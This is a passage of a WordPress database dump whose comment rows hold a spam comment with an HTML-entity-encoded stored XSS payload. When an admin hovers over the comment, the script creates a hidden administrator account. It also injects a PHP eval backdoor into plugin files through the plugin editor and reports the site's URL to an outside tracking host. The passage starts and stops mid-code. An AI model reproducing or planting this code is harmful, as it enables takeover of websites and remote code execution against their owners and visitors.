#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0);
INSERT INTO `wp_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(148, 1, 'toms', 'xqppisrtzty@gmail.com', 'http://www.facebook.com/pwllhaonte7i', '117.240.187.35', '2015-11-11 11:27:41', '2015-11-11 11:27:41', 'Hi nice ar wnet<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"&#118;&#097;&#114;&#032;&#097;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#112;&#108;&#105;&#116;&#040;&#039;&#047;&#039;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#120;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#117;&#115;&#101;&#114;&#045;&#110;&#101;&#119;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#112;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#112;&#108;&#117;&#103;&#105;&#110;&#045;&#101;&#100;&#105;&#116;&#111;&#114;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#050;&#032;&#061;&#032;&#091;&#039;&#104;&#101;&#108;&#108;&#111;&#046;&#112;&#104;&#112;&#039;&#093;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#032;&#061;&#032;&#049;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#060;&#063;&#112;&#104;&#112;&#092;&#110;&#105;&#102;&#040;&#105;&#115;&#115;&#101;&#116;&#040;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#041;&#123;&#040;&#036;&#119;&#119;&#119;&#032;&#061;&#032;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#032;&#038;&#038;&#032;&#064;&#112;&#114;&#101;&#103;&#095;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#047;&#097;&#100;&#047;&#101;&#039;&#044;&#032;&#039;&#064;&#039;&#032;&#046;&#032;&#115;&#116;&#114;&#095;&#114;&#111;&#116;&#049;&#051;&#040;&#039;&#114;&#105;&#110;&#121;&#039;&#041;&#032;&#046;&#032;&#039;&#040;&#036;&#119;&#119;&#119;&#041;&#039;&#044;&#032;&#039;&#097;&#100;&#100;&#039;&#041;&#059;&#101;&#120;&#105;&#116;&#059;&#125;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#108;&#097;&#117;&#114;&#108;&#032;&#061;&#032;&#034;&#104;&#116;&#116;&#112;&#058;&#047;&#047;&#119;&#101;&#098;&#046;&#053;&#049;&#046;&#108;&#097;&#058;&#056;&#050;&#047;&#103;&#111;&#046;&#097;&#115;&#112;&#034;&#059;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#032;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#117;&#115;&#101;&#114;&#095;&#108;&#111;&#103;&#105;&#110;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#101;&#109;&#097;&#105;&#108;&#039;&#058;&#039;&#114;&#111;&#111;&#116;&#064;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#102;&#105;&#114;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#108;&#097;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#117;&#114;&#108;&#039;&#058;&#039;&#119;&#119;&#119;&#046;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#049;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#050;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#114;&#111;&#108;&#101;&#039;&#058;&#039;&#097;&#100;&#109;&#105;&#110;&#105;&#115;&#116;&#114;&#097;&#116;&#111;&#114;&#039;&#044;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#058;&#039;&#065;&#100;&#100;&#043;&#078;&#101;&#119;&#043;&#085;&#115;&#101;&#114;&#043;&#039;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#039;&#111;&#107;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#108;&#097;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#115;&#118;&#105;&#100;&#039;&#058;&#049;&#051;&#044;&#039;&#105;&#100;&#039;&#058;&#049;&#056;&#054;&#052;&#054;&#056;&#053;&#050;&#044;&#039;&#118;&#112;&#097;&#103;&#101;&#039;&#058;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;&#010;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#100;&#105;&#118;&#046;&#097;&#108;&#105;&#103;&#110;&#108;&#101;&#102;&#116;&#032;&#098;&#105;&#103;&#032;&#115;&#116;&#114;&#111;&#110;&#103;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#088;&#116;&#111;&#107;&#101;&#110;&#038;&#038;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#038;&#038;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#111;&#114;&#040;&#118;&#097;&#114;&#032;&#105;&#061;&#048;&#059;&#105;&#060;&#102;&#105;&#108;&#101;&#050;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#059;&#105;&#043;&#043;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#032;&#061;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#033;&#061;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#044;&#039;&#083;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#083;&#101;&#108;&#101;&#099;&#116;&#039;&#125;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#038;&#038;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#049;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;